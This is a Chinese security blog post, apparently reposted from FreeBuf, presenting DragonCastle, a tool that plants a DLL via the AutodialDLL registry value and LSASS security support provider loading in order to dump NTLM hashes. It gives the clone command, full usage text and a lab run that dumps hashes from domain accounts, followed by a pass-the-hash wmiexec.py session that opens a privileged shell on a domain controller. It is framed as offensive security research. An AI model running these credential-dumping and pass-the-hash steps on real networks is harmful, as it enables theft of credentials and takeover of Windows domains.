![图片[1]-如何使用DragonCastle从LSASS进程中提取NTLM哈希-NGC660安全实验室](https://image.3001.net/images/20230411/1681221166_6435662e255dee02fa352.png!small)
关于DragonCastle
DragonCastle是一款结合了AutodialDLL横向渗透技术和SSP的安全工具,该工具旨在帮助广大研究人员从LSASS进程中提取NTLM哈希。
该工具会向目标设备中上传一个DLL,然后它会启用远程注册表功能以修改AutodialDLL条目并启动/重启BITS服务。Svchosts将负责加载我们上传的DLL,再次将AutodialDLL设置为默认值,并执行RPC请求以强制LSASS加载与安全支持提供程序相同的DLL。一旦LSASS加载了DLL,它就会在进程内存中进行搜索,以提取NTLM哈希和密钥/IV。
支持的操作系统版本
操作系统版本 | 支持状态 |
Windows 10 version 21H2 | |
Windows 10 version 21H1 | 支持 |
Windows 10 version 20H2 | 支持 |
Windows 10 version 20H1 (2004) | 支持 |
Windows 10 version 1909 | 支持 |
Windows 10 version 1903 | 支持 |
Windows 10 version 1809 | 支持 |
Windows 10 version 1803 | 支持 |
Windows 10 version 1709 | 支持 |
Windows 10 version 1703 | 支持 |
Windows 10 version 1607 | 支持 |
Windows 10 version 1511 | |
Windows 10 version 1507 | |
Windows 8 | |
Windows 7 |
工具下载
该工具的运行需要使用到Python 3环境,因此我们首先需要在本地设备上安装并配置好Python 3环境。广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/mdsecactivebreach/DragonCastle.git
工具使用帮助
psyconauta@insulanova:~/Research/dragoncastle|⇒ python3 dragoncastle.py -h DragonCastle - @TheXC3LL usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location] DragonCastle - A credential dumper (@TheXC3LL) optional arguments: -h, --help 显示工具帮助信息和退出 -u USERNAME, --username USERNAME 有效用户名 -p PASSWORD, --password PASSWORD 有效密码 -d DOMAIN, --domain DOMAIN 有效域名 -hashes [LMHASH]:NTHASH NT/LM 哈希 -no-pass 不询问密码 -k 使用Kerberos身份验证 -dc-ip ip address 域控制器的IP地址 -target-ip ip address 目标设备的IP地址 -local-dll dll to plant 待上传的DLL本地文件路径 -remote-dll dll location 更新AutodialDLL 注册表项值的远程路径
工具使用样例
Windows服务器地址为192.168.56.20,域控制器地址为192.168.56.10:
psyconauta@insulanova:~/Research/dragoncastle|⇒ python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll DragonCastle - @TheXC3LL [+] Connecting to 192.168.56.20 [+] Uploading DragonCastle.dll to c:\dump.dll [+] Checking Remote Registry service status... [+] Service is down! [+] Starting Remote Registry service... [+] Connecting to 192.168.56.20 [+] Updating AutodialDLL value [+] Stopping Remote Registry Service [+] Checking BITS service status... [+] Service is down! [+] Starting BITS service [+] Downloading creds [+] Deleting credential file [+] Parsing creds: ============ ---- User: vagrant Domain: WINTERFELL ---- User: vagrant Domain: WINTERFELL ---- User: eddard.stark Domain: SEVENKINGDOMS NTLM: d977b98c6c9282c5c478be1d97b237b8 ---- User: eddard.stark Domain: SEVENKINGDOMS NTLM: d977b98c6c9282c5c478be1d97b237b8 ---- User: vagrant Domain: WINTERFELL NTLM: e02bc503339d51f71d913c245d35b50b ---- User: DWM-1 Domain: Window Manager NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: DWM-1 Domain: Window Manager NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: WINTERFELL$ Domain: SEVENKINGDOMS NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: UMFD-0 Domain: Font Driver Host NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: Domain: NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590 ---- User: Domain: ============ [+] Deleting DLL [^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|⇒ wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami sevenkingdoms\eddard.stark C:\>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled C:\>
项目地址
DragonCastle:【GitHub传送门】
参考资料
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
https://adepts.of0x.cc/physical-graffiti-lsass/
本文作者:Alpha_h4ck
转载自FreeBuf.COM
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容